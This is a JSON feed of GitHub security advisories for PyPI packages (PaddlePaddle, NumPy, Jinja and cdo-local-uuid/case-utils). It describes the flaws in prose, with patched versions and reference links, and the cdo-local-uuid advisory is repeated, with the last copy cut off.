{
    "version": "https://jsonfeed.org/version/1",
    "title": "Security Advisory for Python packages hosted at PyPI.org",
    "home_page_url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip",
    "feed_url": "https://azu.github.io/github-advisory-database-rss/pip.json",
    "description": "Security Advisory for Python packages hosted at PyPI.org on GitHub",
    "items": [
        {
            "content_html": "<p>FPE in paddle.linalg.matrix_rank in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-38675\">https://nvd.nist.gov/vuln/detail/CVE-2023-38675</a></li>\n<li><a href=\"https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-007.md\">https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-007.md</a></li>\n<li><a href=\"https://github.com/PaddlePaddle/Paddle/commit/690ffe814dbfc5054d4e92df878687fd638fe3a5\">https://github.com/PaddlePaddle/Paddle/commit/690ffe814dbfc5054d4e92df878687fd638fe3a5</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-jm68-fpmr-8j2g\">https://github.com/advisories/GHSA-jm68-fpmr-8j2g</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-jm68-fpmr-8j2g",
            "title": "[PaddlePaddle] PaddlePaddle floating point exception in paddle.linalg.matrix_rank",
            "date_modified": "2024-01-12T05:08:53.000Z",
            "date_published": "2024-01-03T09:30:32.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-jm68-fpmr-8j2g"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service.</p>\n<p>NOTE: The vendor does not agree this is a vulnerability; In (very limited) circumstances a user may be able provoke the buffer overflow, the user is most likely already privileged to at least provoke denial of service by exhausting memory. Triggering this further requires the use of uncommon API (complicated structured dtypes), which is very unlikely to be available to an unprivileged user.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2021-33430\">https://nvd.nist.gov/vuln/detail/CVE-2021-33430</a></li>\n<li><a href=\"https://github.com/numpy/numpy/issues/18939\">https://github.com/numpy/numpy/issues/18939</a></li>\n<li><a href=\"https://github.com/numpy/numpy/commit/ae317fd9ff3e79c0eac357d723bfc29cbd625f2e\">https://github.com/numpy/numpy/commit/ae317fd9ff3e79c0eac357d723bfc29cbd625f2e</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-6p56-wp2h-9hxr\">https://github.com/advisories/GHSA-6p56-wp2h-9hxr</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-6p56-wp2h-9hxr",
            "title": "[numpy] NumPy Buffer Overflow (Disputed)",
            "date_modified": "2024-01-11T21:28:19.000Z",
            "date_published": "2022-01-07T00:09:39.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-6p56-wp2h-9hxr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The <code>xmlattr</code> filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the <code>xmlattr</code> filter, and an application doing so should already be verifying what keys are provided regardless of this fix.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\">https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22195\">https://nvd.nist.gov/vuln/detail/CVE-2024-22195</a></li>\n<li><a href=\"https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7\">https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7</a></li>\n<li><a href=\"https://github.com/pallets/jinja/releases/tag/3.1.3\">https://github.com/pallets/jinja/releases/tag/3.1.3</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h5c8-rqwp-cp95\">https://github.com/advisories/GHSA-h5c8-rqwp-cp95</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-h5c8-rqwp-cp95",
            "title": "[jinja2] Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter",
            "date_modified": "2024-01-11T15:20:50.000Z",
            "date_published": "2024-01-11T15:20:48.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-h5c8-rqwp-cp95"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a 